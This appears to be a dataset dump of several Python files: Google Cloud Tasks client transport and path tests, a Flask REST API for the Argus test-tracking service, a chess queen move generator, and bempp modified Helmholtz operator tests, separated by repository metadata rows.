transport = transports.CloudTasksGrpcAsyncIOTransport(
host="squid.clam.whelk",
channel=channel,
api_mtls_endpoint="mtls.squid.clam.whelk",
client_cert_source=callback,
)
assert transport.grpc_channel == channel
assert transport._host == "squid.clam.whelk:443"
assert not callback.called
@mock.patch("grpc.ssl_channel_credentials", autospec=True)
@mock.patch("google.api_core.grpc_helpers.create_channel", autospec=True)
def test_cloud_tasks_grpc_transport_channel_mtls_with_client_cert_source(
grpc_create_channel, grpc_ssl_channel_cred
):
# Check that if channel is None, but api_mtls_endpoint and client_cert_source
# are provided, then a mTLS channel will be created.
mock_cred = mock.Mock()
mock_ssl_cred = mock.Mock()
grpc_ssl_channel_cred.return_value = mock_ssl_cred
mock_grpc_channel = mock.Mock()
grpc_create_channel.return_value = mock_grpc_channel
transport = transports.CloudTasksGrpcTransport(
host="squid.clam.whelk",
credentials=mock_cred,
api_mtls_endpoint="mtls.squid.clam.whelk",
client_cert_source=client_cert_source_callback,
)
grpc_ssl_channel_cred.assert_called_once_with(
certificate_chain=b"cert bytes", private_key=b"key bytes"
)
grpc_create_channel.assert_called_once_with(
"mtls.squid.clam.whelk:443",
credentials=mock_cred,
credentials_file=None,
scopes=("https://www.googleapis.com/auth/cloud-platform",),
ssl_credentials=mock_ssl_cred,
quota_project_id=None,
)
assert transport.grpc_channel == mock_grpc_channel
@mock.patch("grpc.ssl_channel_credentials", autospec=True)
@mock.patch("google.api_core.grpc_helpers_async.create_channel", autospec=True)
def test_cloud_tasks_grpc_asyncio_transport_channel_mtls_with_client_cert_source(
grpc_create_channel, grpc_ssl_channel_cred
):
# Check that if channel is None, but api_mtls_endpoint and client_cert_source
# are provided, then a mTLS channel will be created.
mock_cred = mock.Mock()
mock_ssl_cred = mock.Mock()
grpc_ssl_channel_cred.return_value = mock_ssl_cred
mock_grpc_channel = mock.Mock()
grpc_create_channel.return_value = mock_grpc_channel
transport = transports.CloudTasksGrpcAsyncIOTransport(
host="squid.clam.whelk",
credentials=mock_cred,
api_mtls_endpoint="mtls.squid.clam.whelk",
client_cert_source=client_cert_source_callback,
)
grpc_ssl_channel_cred.assert_called_once_with(
certificate_chain=b"cert bytes", private_key=b"key bytes"
)
grpc_create_channel.assert_called_once_with(
"mtls.squid.clam.whelk:443",
credentials=mock_cred,
credentials_file=None,
scopes=("https://www.googleapis.com/auth/cloud-platform",),
ssl_credentials=mock_ssl_cred,
quota_project_id=None,
)
assert transport.grpc_channel == mock_grpc_channel
@pytest.mark.parametrize(
"api_mtls_endpoint", ["mtls.squid.clam.whelk", "mtls.squid.clam.whelk:443"]
)
@mock.patch("google.api_core.grpc_helpers.create_channel", autospec=True)
def test_cloud_tasks_grpc_transport_channel_mtls_with_adc(
grpc_create_channel, api_mtls_endpoint
):
# Check that if channel and client_cert_source are None, but api_mtls_endpoint
# is provided, then a mTLS channel will be created with SSL ADC.
mock_grpc_channel = mock.Mock()
grpc_create_channel.return_value = mock_grpc_channel
# Mock google.auth.transport.grpc.SslCredentials class.
mock_ssl_cred = mock.Mock()
with mock.patch.multiple(
"google.auth.transport.grpc.SslCredentials",
__init__=mock.Mock(return_value=None),
ssl_credentials=mock.PropertyMock(return_value=mock_ssl_cred),
):
mock_cred = mock.Mock()
transport = transports.CloudTasksGrpcTransport(
host="squid.clam.whelk",
credentials=mock_cred,
api_mtls_endpoint=api_mtls_endpoint,
client_cert_source=None,
)
grpc_create_channel.assert_called_once_with(
"mtls.squid.clam.whelk:443",
credentials=mock_cred,
credentials_file=None,
scopes=("https://www.googleapis.com/auth/cloud-platform",),
ssl_credentials=mock_ssl_cred,
quota_project_id=None,
)
assert transport.grpc_channel == mock_grpc_channel
@pytest.mark.parametrize(
"api_mtls_endpoint", ["mtls.squid.clam.whelk", "mtls.squid.clam.whelk:443"]
)
@mock.patch("google.api_core.grpc_helpers_async.create_channel", autospec=True)
def test_cloud_tasks_grpc_asyncio_transport_channel_mtls_with_adc(
grpc_create_channel, api_mtls_endpoint
):
# Check that if channel and client_cert_source are None, but api_mtls_endpoint
# is provided, then a mTLS channel will be created with SSL ADC.
mock_grpc_channel = mock.Mock()
grpc_create_channel.return_value = mock_grpc_channel
# Mock google.auth.transport.grpc.SslCredentials class.
mock_ssl_cred = mock.Mock()
with mock.patch.multiple(
"google.auth.transport.grpc.SslCredentials",
__init__=mock.Mock(return_value=None),
ssl_credentials=mock.PropertyMock(return_value=mock_ssl_cred),
):
mock_cred = mock.Mock()
transport = transports.CloudTasksGrpcAsyncIOTransport(
host="squid.clam.whelk",
credentials=mock_cred,
api_mtls_endpoint=api_mtls_endpoint,
client_cert_source=None,
)
grpc_create_channel.assert_called_once_with(
"mtls.squid.clam.whelk:443",
credentials=mock_cred,
credentials_file=None,
scopes=("https://www.googleapis.com/auth/cloud-platform",),
ssl_credentials=mock_ssl_cred,
quota_project_id=None,
)
assert transport.grpc_channel == mock_grpc_channel
def test_task_path():
project = "squid"
location = "clam"
queue = "whelk"
task = "octopus"
expected = "projects/{project}/locations/{location}/queues/{queue}/tasks/{task}".format(
project=project, location=location, queue=queue, task=task,
)
actual = CloudTasksClient.task_path(project, location, queue, task)
assert expected == actual
def test_parse_task_path():
expected = {
"project": "oyster",
"location": "nudibranch",
"queue": "cuttlefish",
"task": "mussel",
}
path = CloudTasksClient.task_path(**expected)
# Check that the path construction is reversible.
actual = CloudTasksClient.parse_task_path(path)
assert expected == actual
def test_queue_path():
project = "squid"
location = "clam"
queue = "whelk"
expected = "projects/{project}/locations/{location}/queues/{queue}".format(
project=project, location=location, queue=queue,
)
actual = CloudTasksClient.queue_path(project, location, queue)
assert expected == actual
def test_parse_queue_path():
expected = {
"project": "octopus",
"location": "oyster",
"queue": "nudibranch",
}
path = CloudTasksClient.queue_path(**expected)
# Check that the path construction is reversible.
actual = CloudTasksClient.parse_queue_path(path)
assert expected == actual
def test_client_withDEFAULT_CLIENT_INFO():
client_info = gapic_v1.client_info.ClientInfo()
with mock.patch.object(
transports.CloudTasksTransport, "_prep_wrapped_messages"
) as prep:
client = CloudTasksClient(
credentials=credentials.AnonymousCredentials(), client_info=client_info,
)
prep.assert_called_once_with(client_info)
with mock.patch.object(
transports.CloudTasksTransport, "_prep_wrapped_messages"
) as prep:
transport_class = CloudTasksClient.get_transport_class()
transport = transport_class(
credentials=credentials.AnonymousCredentials(), client_info=client_info,
)
prep.assert_called_once_with(client_info)
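# ---------------------------------------------------------------------------
# A minimal standalone sketch (editorial, not part of the generated suite
# above) of the transport-mocking pattern every test in this file relies on:
# patch __call__ on the transport's bound gRPC stub, invoke the client method,
# then inspect call.mock_calls. The imports mirror the ones the suite uses.
# ---------------------------------------------------------------------------
from unittest import mock

from google.auth import credentials
from google.cloud.tasks_v2beta3 import CloudTasksClient
from google.cloud.tasks_v2beta3.types import cloudtasks


def demo_transport_mocking():
    client = CloudTasksClient(credentials=credentials.AnonymousCredentials())
    # Patching the stub's type means the mock intercepts the unary call the
    # client would otherwise send over the wire.
    with mock.patch.object(type(client._transport.delete_task), "__call__") as call:
        call.return_value = None  # DeleteTask returns Empty, surfaced as None
        client.delete_task(cloudtasks.DeleteTaskRequest(name="name/value"))
        _, args, _ = call.mock_calls[0]
        assert args[0].name == "name/value"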
| avg_line_length: 36.561858 | max_line_length: 111 | alphanum_fraction: 0.686378 |
| num_words: 19,051 | num_chars: 156,631 | num_lines: 4,283 |

| hexsha: 9365d4790bbe98eb6dabb878b1132d53621583a6 | size: 18,751 | ext: py | lang: Python |
| repo_path: argus/backend/api.py | repo_name: dkropachev/argus |
| repo_head_hexsha: e1d7b6cecb6ffcbcfbf46b6da1346b2f8308cd26 | licenses: ["Apache-2.0"] |
| max_stars_count: null | max_issues_count: null | max_forks_count: null |
import logging
from uuid import UUID
from flask import (
Blueprint,
request
)
from flask.json import jsonify
from argus.backend.argus_service import ArgusService
from argus.backend.auth import login_required
# pylint: disable=broad-except
bp = Blueprint('api', __name__, url_prefix='/api/v1')
LOGGER = logging.getLogger(__name__)
@bp.route("/version")
def version():
service = ArgusService()
argus_version = service.get_version()
return jsonify({
"status": "ok",
"response": {
"commit_id": argus_version
}
})
@bp.route("/releases")
@login_required
def releases():
service = ArgusService()
all_releases = service.get_releases()
return jsonify({
"status": "ok",
"response": [dict(d.items()) for d in all_releases]
})
@bp.route("/release/activity", methods=["POST"])
@login_required
def release_activity():
res = {
"status": "ok"
}
try:
if not request.is_json:
raise Exception(
"Content-Type mismatch, expected application/json, got:", request.content_type)
request_payload = request.get_json()
service = ArgusService()
res["response"] = service.fetch_release_activity(request_payload)
except Exception as exc:
LOGGER.error("Something happened during request %s", request)
res["status"] = "error"
res["response"] = {
"exception": exc.__class__.__name__,
"arguments": exc.args
}
return jsonify(res)
@bp.route("/release/schedules", methods=["POST"])
@login_required
def release_schedules():
res = {
"status": "ok"
}
try:
if not request.is_json:
raise Exception(
"Content-Type mismatch, expected application/json, got:", request.content_type)
request_payload = request.get_json()
service = ArgusService()
res["response"] = service.get_schedules_for_release(request_payload)
except Exception as exc:
LOGGER.error("Something happened during request %s", request)
res["status"] = "error"
res["response"] = {
"exception": exc.__class__.__name__,
"arguments": exc.args
}
return jsonify(res)
@bp.route("/release/schedules/today/assignees", methods=["POST"])
@login_required
def release_schedules_today_assignees():
res = {
"status": "ok"
}
try:
if not request.is_json:
raise Exception(
"Content-Type mismatch, expected application/json, got:", request.content_type)
request_payload = request.get_json()
service = ArgusService()
res["response"] = service.get_assignees(request_payload)
except Exception as exc:
LOGGER.error("Something happened during request %s", request)
res["status"] = "error"
res["response"] = {
"exception": exc.__class__.__name__,
"arguments": exc.args
}
return jsonify(res)
@bp.route("/release/schedules/submit", methods=["POST"])
@login_required
def release_schedules_submit():
res = {
"status": "ok"
}
try:
if not request.is_json:
raise Exception(
"Content-Type mismatch, expected application/json, got:", request.content_type)
request_payload = request.get_json()
service = ArgusService()
res["response"] = service.submit_new_schedule(request_payload)
except Exception as exc:
LOGGER.error("Something happened during request %s", request)
res["status"] = "error"
res["response"] = {
"exception": exc.__class__.__name__,
"arguments": exc.args
}
return jsonify(res)
@bp.route("/release/schedules/delete", methods=["POST"])
@login_required
def release_schedules_delete():
res = {
"status": "ok"
}
try:
if not request.is_json:
raise Exception(
"Content-Type mismatch, expected application/json, got:", request.content_type)
request_payload = request.get_json()
service = ArgusService()
res["response"] = service.delete_schedule(request_payload)
except Exception as exc:
LOGGER.error("Something happened during request %s", request)
res["status"] = "error"
res["response"] = {
"exception": exc.__class__.__name__,
"arguments": exc.args
}
return jsonify(res)
@bp.route("/release/issues", methods=["POST"])
@login_required
def release_issues():
res = {
"status": "ok"
}
try:
if not request.is_json:
raise Exception(
"Content-Type mismatch, expected application/json, got:", request.content_type)
request_payload = request.get_json()
service = ArgusService()
res["response"] = service.fetch_release_issues(request_payload)
except Exception as exc:
LOGGER.error("Something happened during request %s", request)
res["status"] = "error"
res["response"] = {
"exception": exc.__class__.__name__,
"arguments": exc.args
}
return jsonify(res)
@bp.route("/release_groups", methods=["POST"])
@login_required
def release_groups():
res = {
"status": "ok"
}
try:
if not request.is_json:
raise Exception(
"Content-Type mismatch, expected application/json, got:", request.content_type)
request_payload = request.get_json()
service = ArgusService()
groups = service.get_groups_for_release(
UUID(request_payload["release"]["id"]))
res["response"] = [dict(g.items()) for g in groups]
except Exception as exc:
LOGGER.error("Something happened during request %s", request)
res["status"] = "error"
res["response"] = {
"exception": exc.__class__.__name__,
"arguments": exc.args
}
return jsonify(res)
@bp.route("/tests", methods=["POST"])
@login_required
def tests():
res = {
"status": "ok"
}
try:
if not request.is_json:
raise Exception(
"Content-Type mismatch, expected application/json, got:", request.content_type)
request_payload = request.get_json()
service = ArgusService()
release_group_tests = service.get_tests_for_release_group(
group_id=request_payload["group"]["id"])
res["response"] = {"tests": [dict(t.items()) for t in release_group_tests]}
except Exception as exc:
LOGGER.error("Something happened during request %s", request)
res["status"] = "error"
res["response"] = {
"exception": exc.__class__.__name__,
"arguments": exc.args
}
return jsonify(res)
@bp.route("/tests/last_status", methods=["POST"])
@login_required
def tests_last_status():
res = {
"status": "ok"
}
try:
if not request.is_json:
raise Exception(
"Content-Type mismatch, expected application/json, got:", request.content_type)
request_payload = request.get_json()
service = ArgusService()
res["response"] = service.get_test_last_run_status(request_payload)
except Exception as exc:
LOGGER.error("Something happened during request %s", request)
res["status"] = "error"
res["response"] = {
"exception": exc.__class__.__name__,
"arguments": exc.args
}
return jsonify(res)
@bp.route("/test_runs", methods=["POST"])
@login_required
def test_runs():
res = {
"status": "ok"
}
try:
if not request.is_json:
raise Exception(
"Content-Type mismatch, expected application/json, got:", request.content_type)
request_payload = request.get_json()
service = ArgusService()
release_group_runs = service.get_runs_by_name_for_release_group(
release_name=request_payload["release"],
test_name=request_payload["test_name"],
limit=request_payload.get("limit", 10)
)
res["response"] = release_group_runs
except Exception as exc:
LOGGER.error("Something happened during request %s", request)
res["status"] = "error"
res["response"] = {
"exception": exc.__class__.__name__,
"arguments": exc.args
}
return jsonify(res)
@bp.route("/test_run", methods=["POST"])
@login_required
def test_run():
res = {
"status": "ok"
}
try:
if not request.is_json:
raise Exception(
"Content-Type mismatch, expected application/json, got:", request.content_type)
request_payload = request.get_json()
service = ArgusService()
loaded_run = service.load_test_run(
test_run_id=UUID(request_payload["test_id"]))
res["response"] = loaded_run.serialize()
except Exception as exc:
LOGGER.error("Something happened during request %s", request)
res["status"] = "error"
res["response"] = {
"exception": exc.__class__.__name__,
"arguments": exc.args
}
return jsonify(res)
@bp.route("/test_run/comments", methods=["POST"])
@login_required
def test_run_comments():
res = {
"status": "ok"
}
try:
if not request.is_json:
raise Exception(
"Content-Type mismatch, expected application/json, got:", request.content_type)
request_payload = request.get_json()
service = ArgusService()
comments = service.get_comments(
test_id=UUID(request_payload["test_id"]))
res["response"] = [dict(c.items()) for c in comments]
except Exception as exc:
LOGGER.error("Something happened during request %s", request)
res["status"] = "error"
res["response"] = {
"exception": exc.__class__.__name__,
"arguments": exc.args
}
return jsonify(res)
@bp.route("/test_run/comments/submit", methods=["POST"])
@login_required
def test_run_submit_comment():
res = {
"status": "ok"
}
try:
if not request.is_json:
raise Exception(
"Content-Type mismatch, expected application/json, got:", request.content_type)
request_payload = request.get_json()
service = ArgusService()
result = service.post_comment(payload=request_payload)
res["response"] = [dict(c.items()) for c in result]
except Exception as exc:
LOGGER.error("Something happened during request %s", request)
res["status"] = "error"
res["response"] = {
"exception": exc.__class__.__name__,
"arguments": exc.args
}
return jsonify(res)
@bp.route("/users", methods=["POST"])
@login_required
def user_info():
res = {
"status": "ok"
}
try:
if not request.is_json:
raise Exception(
"Content-Type mismatch, expected application/json, got:", request.content_type)
service = ArgusService()
result = service.get_user_info()
res["response"] = result
except Exception as exc:
LOGGER.error("Something happened during request %s", request)
res["status"] = "error"
res["response"] = {
"exception": exc.__class__.__name__,
"arguments": exc.args
}
return jsonify(res)
@bp.route("/stats", methods=["POST"])
@login_required
def run_stats():
res = {
"status": "ok"
}
try:
if not request.is_json:
raise Exception(
"Content-Type mismatch, expected application/json, got:", request.content_type)
request_payload = request.get_json()
service = ArgusService()
res["response"] = service.collect_stats(request_payload)
except Exception as exc:
LOGGER.error("Something happened during request %s", request)
res["status"] = "error"
res["response"] = {
"exception": exc.__class__.__name__,
"arguments": exc.args
}
return jsonify(res)
@bp.route("/test_runs/poll", methods=["POST"])
@login_required
def test_runs_poll():
res = {
"status": "ok"
}
try:
if not request.is_json:
raise Exception(
"Content-Type mismatch, expected application/json, got:", request.content_type)
request_payload = request.get_json()
service = ArgusService()
res["response"] = service.poll_test_runs(request_payload)
except Exception as exc:
LOGGER.error("Something happened during request %s", request)
res["status"] = "error"
res["response"] = {
"exception": exc.__class__.__name__,
"arguments": exc.args
}
return jsonify(res)
@bp.route("/test_run/poll", methods=["POST"])
@login_required
def test_run_poll_single():
res = {
"status": "ok"
}
try:
if not request.is_json:
raise Exception(
"Content-Type mismatch, expected application/json, got:", request.content_type)
request_payload = request.get_json()
service = ArgusService()
res["response"] = service.poll_test_runs_single(request_payload)
except Exception as exc:
LOGGER.error("Something happened during request %s", request)
res["status"] = "error"
res["response"] = {
"exception": exc.__class__.__name__,
"arguments": exc.args
}
return jsonify(res)
@bp.route("/test_run/change_status", methods=["POST"])
@login_required
def test_run_change_status():
res = {
"status": "ok"
}
try:
if not request.is_json:
raise Exception(
"Content-Type mismatch, expected application/json, got:", request.content_type)
request_payload = request.get_json()
service = ArgusService()
res["response"] = service.toggle_test_status(request_payload)
except Exception as exc:
LOGGER.error("Something happened during request %s", request)
res["status"] = "error"
res["response"] = {
"exception": exc.__class__.__name__,
"arguments": exc.args
}
return jsonify(res)
@bp.route("/test_run/change_assignee", methods=["POST"])
@login_required
def test_run_change_assignee():
res = {
"status": "ok"
}
try:
if not request.is_json:
raise Exception(
"Content-Type mismatch, expected application/json, got:", request.content_type)
request_payload = request.get_json()
service = ArgusService()
res["response"] = service.change_assignee(request_payload)
except Exception as exc:
LOGGER.error("Something happened during request %s", request)
res["status"] = "error"
res["response"] = {
"exception": exc.__class__.__name__,
"arguments": exc.args
}
return jsonify(res)
@bp.route("/test_run/activity", methods=["POST"])
@login_required
def test_run_activity():
res = {
"status": "ok"
}
try:
if not request.is_json:
raise Exception(
"Content-Type mismatch, expected application/json, got:", request.content_type)
request_payload = request.get_json()
service = ArgusService()
res["response"] = service.fetch_run_activity(request_payload)
except Exception as exc:
LOGGER.error("Something happened during request %s", request)
res["status"] = "error"
res["response"] = {
"exception": exc.__class__.__name__,
"arguments": exc.args
}
return jsonify(res)
@bp.route("/release/create", methods=["POST"])
@login_required
def release_create():
res = {
"status": "ok"
}
try:
if not request.is_json:
raise Exception(
"Content-Type mismatch, expected application/json, got:", request.content_type)
request_payload = request.get_json()
service = ArgusService()
res["response"] = service.create_release(request_payload)
except Exception as exc:
LOGGER.error("Something happened during request %s", request)
res["status"] = "error"
res["response"] = {
"exception": exc.__class__.__name__,
"arguments": exc.args
}
return jsonify(res)
@bp.route("/issues/submit", methods=["POST"])
@login_required
def issues_submit():
res = {
"status": "ok"
}
try:
if not request.is_json:
raise Exception(
"Content-Type mismatch, expected application/json, got:", request.content_type)
request_payload = request.get_json()
service = ArgusService()
res["response"] = service.submit_github_issue(request_payload)
except Exception as exc:
LOGGER.error("Something happened during request %s", request)
res["status"] = "error"
res["response"] = {
"exception": exc.__class__.__name__,
"arguments": exc.args
}
return jsonify(res)
@bp.route("/issues/get", methods=["POST"])
@login_required
def issues_get():
res = {
"status": "ok"
}
try:
if not request.is_json:
raise Exception(
"Content-Type mismatch, expected application/json, got:", request.content_type)
request_payload = request.get_json()
service = ArgusService()
res["response"] = service.get_github_issues(request_payload)
except Exception as exc:
LOGGER.error("Something happened during request %s", request)
res["status"] = "error"
res["response"] = {
"exception": exc.__class__.__name__,
"arguments": exc.args
}
return jsonify(res)
@bp.route("/issues/state", methods=["POST"])
@login_required
def issues_state():
res = {
"status": "ok"
}
try:
if not request.is_json:
raise Exception(
"Content-Type mismatch, expected application/json, got:", request.content_type)
request_payload = request.get_json()
service = ArgusService()
res["response"] = service.get_github_issue_state(request_payload)
except Exception as exc:
LOGGER.error("Something happened during request %s", request)
res["status"] = "error"
res["response"] = {
"exception": exc.__class__.__name__,
"arguments": exc.args
}
return jsonify(res)
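# ---------------------------------------------------------------------------
# Editorial sketch (not part of the source file): every endpoint above repeats
# the same JSON-content check and error envelope. That boilerplate could be
# factored into a decorator like the hypothetical `api_endpoint` below, with
# handlers receiving the already-parsed payload.
# ---------------------------------------------------------------------------
import functools


def api_endpoint(handler):
    """Wrap a handler with the JSON check and error envelope used above."""
    @functools.wraps(handler)
    def wrapper(*args, **kwargs):
        res = {"status": "ok"}
        try:
            if not request.is_json:
                raise Exception(
                    "Content-Type mismatch, expected application/json, got:",
                    request.content_type)
            res["response"] = handler(request.get_json(), *args, **kwargs)
        except Exception as exc:
            LOGGER.error("Something happened during request %s", request)
            res["status"] = "error"
            res["response"] = {
                "exception": exc.__class__.__name__,
                "arguments": exc.args
            }
        return jsonify(res)
    return wrapper


# Example usage of the sketch (equivalent to the run_stats endpoint above):
# @bp.route("/stats", methods=["POST"])
# @login_required
# @api_endpoint
# def run_stats(request_payload):
#     return ArgusService().collect_stats(request_payload)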
| avg_line_length: 31.044702 | max_line_length: 95 | alphanum_fraction: 0.599488 |
| num_words: 1,979 | num_chars: 18,751 | num_lines: 603 |

| hexsha: 93821324686b194a0973439dcb99a4917275df88 | size: 2,031 | ext: py | lang: Python |
| repo_path: pieces/queen.py | repo_name: nherbert25/chess_test |
| repo_head_hexsha: 5cebe4d57c9a1bdc073925079f8530ad900041c9 | licenses: ["MIT"] |
| max_stars_count: null | max_issues_count: null | max_forks_count: null |
from pieces.piece import Piece
class Queen(Piece):
alliance = None
position = None
name = 'queen'
def __init__(self, alliance, position):
Piece.__init__(self, alliance)
self.alliance = alliance
self.position = position
def toString(self):
return("Q" if self.alliance == "Black" else "q")
def movement(self, original_position):
potential_legal_moves = []
potential_legal_moves.append([])
test_position = original_position-1
        while test_position % 8 < original_position % 8:
potential_legal_moves[0].append(test_position)
test_position -= 1
potential_legal_moves.append([])
test_position = original_position+1
        while test_position % 8 > original_position % 8:
potential_legal_moves[1].append(test_position)
test_position += 1
potential_legal_moves.append([])
test_position = original_position-8
while test_position >= 0:
potential_legal_moves[2].append(test_position)
test_position -= 8
potential_legal_moves.append([])
test_position = original_position+8
while test_position <= 63:
potential_legal_moves[3].append(test_position)
test_position += 8
potential_legal_moves.append([])
test_position = original_position-9
while test_position >= 0 and test_position % 8 < original_position % 8:
potential_legal_moves[4].append(test_position)
test_position -= 9
potential_legal_moves.append([])
test_position = original_position-7
while test_position >= 0 and test_position % 8 > original_position % 8:
potential_legal_moves[5].append(test_position)
test_position -= 7
potential_legal_moves.append([])
test_position = original_position+9
while test_position <= 63 and test_position % 8 > original_position % 8:
potential_legal_moves[6].append(test_position)
test_position += 9
potential_legal_moves.append([])
test_position = original_position+7
while test_position <= 63 and test_position % 8 < original_position % 8:
potential_legal_moves[7].append(test_position)
test_position += 7
return(potential_legal_moves)
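# ---------------------------------------------------------------------------
# Usage sketch (editorial, not part of the source file): movement() returns
# eight rays of candidate squares on a 0-63 board, one list per direction, in
# step order -1, +1, -8, +8, -9, -7, +9, +7 from the queen's square.
# ---------------------------------------------------------------------------
if __name__ == "__main__":
    queen = Queen("White", 27)
    rays = queen.movement(27)
    print(rays[0])  # step -1 along the rank: [26, 25, 24]
    print(rays[2])  # step -8 along the file: [19, 11, 3]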
| avg_line_length: 29.867647 | max_line_length: 74 | alphanum_fraction: 0.753816 |
| num_words: 270 | num_chars: 2,031 | num_lines: 68 |

| hexsha: 4f0560f751cb6660590760da9ee4bff9596b1a27 | size: 8,079 | ext: py | lang: Python |
| repo_path: test/validation/operators/boundary/test_modified_helmholtz.py | repo_name: pescap/bempp-cl |
| repo_head_hexsha: 3a68666e8db0e873d418b734289067483f68f12e | licenses: ["MIT"] |
| max_stars_count: null | max_issues_count: null | max_forks_count: null |
"""Unit tests for modified Helmholtz operators."""
# pylint: disable=redefined-outer-name
# pylint: disable=C0103
import numpy as _np
import pytest
pytestmark = pytest.mark.usefixtures("default_parameters", "helpers")
OMEGA = 2.5
def test_modified_helmholtz_single_layer(
default_parameters, helpers, precision, device_interface
):
"""Test dense assembler for modified Helmholtz."""
from bempp.api import function_space
from bempp.api.operators.boundary.modified_helmholtz import single_layer
grid = helpers.load_grid("sphere")
space = function_space(grid, "P", 1)
discrete_op = single_layer(
space,
space,
space,
OMEGA,
assembler="dense",
precision=precision,
device_interface=device_interface,
parameters=default_parameters,
).weak_form()
# Bempp 3 assembles modified Helmholtz as complex type, so cast to real.
expected = _np.real(
helpers.load_npy_data("modified_helmholtz_single_layer_boundary")
)
_np.testing.assert_allclose(
discrete_op.A, expected, rtol=helpers.default_tolerance(precision)
)
def test_modified_helmholtz_double_layer_p1_cont(
default_parameters, helpers, precision, device_interface
):
"""Test dense assembler for the modified Helmholtz dlp."""
from bempp.api import function_space
from bempp.api.operators.boundary.modified_helmholtz import double_layer
grid = helpers.load_grid("sphere")
space = function_space(grid, "P", 1)
discrete_op = double_layer(
space,
space,
space,
OMEGA,
assembler="dense",
precision=precision,
device_interface=device_interface,
parameters=default_parameters,
).weak_form()
expected = _np.real(
helpers.load_npy_data("modified_helmholtz_double_layer_boundary")
)
_np.testing.assert_allclose(
discrete_op.A, expected, rtol=helpers.default_tolerance(precision)
)
def test_modified_helmholtz_adjoint_double_layer(
default_parameters, helpers, precision, device_interface
):
"""Test dense assembler for the Helmholtz adjoint dlp."""
from bempp.api import function_space
from bempp.api.operators.boundary.modified_helmholtz import adjoint_double_layer
grid = helpers.load_grid("sphere")
space = function_space(grid, "P", 1)
discrete_op = adjoint_double_layer(
space,
space,
space,
OMEGA,
assembler="dense",
precision=precision,
device_interface=device_interface,
parameters=default_parameters,
).weak_form()
expected = _np.real(
helpers.load_npy_data("modified_helmholtz_adj_double_layer_boundary")
)
_np.testing.assert_allclose(
discrete_op.A, expected, rtol=helpers.default_tolerance(precision)
)
def test_modified_helmholtz_hypersingular(
default_parameters, helpers, precision, device_interface
):
"""Test dense assembler for the modified Helmholtz hypersingular operator."""
from bempp.api import function_space
from bempp.api.operators.boundary.modified_helmholtz import hypersingular
grid = helpers.load_grid("sphere")
space = function_space(grid, "P", 1)
discrete_op = hypersingular(
space,
space,
space,
OMEGA,
assembler="dense",
precision=precision,
device_interface=device_interface,
parameters=default_parameters,
).weak_form()
expected = _np.real(
helpers.load_npy_data("modified_helmholtz_hypersingular_boundary")
)
_np.testing.assert_allclose(
discrete_op.A, expected, rtol=helpers.default_tolerance(precision)
)
# def test_modified_helmholtz_single_layer_evaluator(
# default_parameters, helpers, precision, device_interface
# ):
# """Test dense evaluator for modified Helmholtz slp."""
# from bempp.api import function_space
# from bempp.api.operators.boundary.modified_helmholtz import single_layer
# grid = helpers.load_grid("sphere")
# space = function_space(grid, "P", 1)
# discrete_op = single_layer(
# space,
# space,
# space,
# OMEGA,
# assembler="dense_evaluator",
# precision=precision,
# device_interface=device_interface,
# parameters=default_parameters,
# ).weak_form()
# mat = single_layer(
# space,
# space,
# space,
# OMEGA,
# assembler="dense",
# precision=precision,
# device_interface=device_interface,
# parameters=default_parameters,
# ).weak_form()
# x = _np.random.RandomState(0).randn(space.global_dof_count)
# actual = discrete_op @ x
# expected = mat @ x
# if precision == "single":
# tol = 1e-4
# else:
# tol = 1e-12
# _np.testing.assert_allclose(actual, expected, rtol=tol)
# def test_modified_helmholtz_double_layer_evaluator(
# default_parameters, helpers, precision, device_interface
# ):
# """Test dense evaluator for modified Helmholtz dlp."""
# from bempp.api import function_space
# from bempp.api.operators.boundary.modified_helmholtz import double_layer
# grid = helpers.load_grid("sphere")
# space = function_space(grid, "P", 1)
# discrete_op = double_layer(
# space,
# space,
# space,
# OMEGA,
# assembler="dense_evaluator",
# precision=precision,
# device_interface=device_interface,
# parameters=default_parameters,
# ).weak_form()
# mat = double_layer(
# space,
# space,
# space,
# OMEGA,
# assembler="dense",
# precision=precision,
# device_interface=device_interface,
# parameters=default_parameters,
# ).weak_form()
# x = _np.random.RandomState(0).randn(space.global_dof_count)
# actual = discrete_op @ x
# expected = mat @ x
# if precision == "single":
# tol = 1e-4
# else:
# tol = 1e-12
# _np.testing.assert_allclose(actual, expected, rtol=tol)
# def test_modified_helmholtz_adj_double_layer_evaluator(
# default_parameters, helpers, precision, device_interface
# ):
# """Test dense evaluator for modified Helmholtz adj dlp."""
# from bempp.api import function_space
# from bempp.api.operators.boundary.modified_helmholtz import adjoint_double_layer
# grid = helpers.load_grid("sphere")
# space = function_space(grid, "P", 1)
# discrete_op = adjoint_double_layer(
# space,
# space,
# space,
# OMEGA,
# assembler="dense_evaluator",
# precision=precision,
# device_interface=device_interface,
# parameters=default_parameters,
# ).weak_form()
# mat = adjoint_double_layer(
# space,
# space,
# space,
# OMEGA,
# assembler="dense",
# precision=precision,
# device_interface=device_interface,
# parameters=default_parameters,
# ).weak_form()
# x = _np.random.RandomState(0).randn(space.global_dof_count)
# actual = discrete_op @ x
# expected = mat @ x
# if precision == "single":
# tol = 1e-4
# else:
# tol = 1e-12
# _np.testing.assert_allclose(actual, expected, rtol=tol)
# def test_modified_helmholtz_hypersingular_evaluator(
# default_parameters, helpers, precision, device_interface
# ):
# """Test dense evaluator for modified Helmholtz hypersingular."""
# from bempp.api import function_space
# from bempp.api.operators.boundary.modified_helmholtz import hypersingular
# grid = helpers.load_grid("sphere")
# space = function_space(grid, "P", 1)
# discrete_op = hypersingular(
# space,
# space,
# space,
# OMEGA,
# assembler="dense_evaluator",
# precision=precision,
# device_interface=device_interface,
# parameters=default_parameters,
# ).weak_form()
# mat = hypersingular(
# space,
# space,
# space,
# OMEGA,
# assembler="dense",
# precision=precision,
# device_interface=device_interface,
# parameters=default_parameters,
# ).weak_form()
# x = _np.random.RandomState(0).randn(space.global_dof_count)
# actual = discrete_op @ x
# expected = mat @ x
# if precision == "single":
# tol = 1e-4
# else:
# tol = 1e-12
# _np.testing.assert_allclose(actual, expected, rtol=tol)
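# ---------------------------------------------------------------------------
# A small helper sketch (hypothetical, not in the source file) capturing the
# tolerance rule the commented-out evaluator tests above repeat: single
# precision compares at 1e-4, double precision at 1e-12.
# ---------------------------------------------------------------------------
def _evaluator_tolerance(precision):
    """Relative tolerance for evaluator-vs-dense comparisons."""
    return 1e-4 if precision == "single" else 1e-12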
| avg_line_length: 25.647619 | max_line_length: 85 | alphanum_fraction: 0.693526 |
| num_words: 912 | num_chars: 8,079 | num_lines: 314 |

| hexsha: 87ce68122b9f404081e0df04ae6022f0dcf9d582 | size: 2,182 | ext: py | lang: Python |
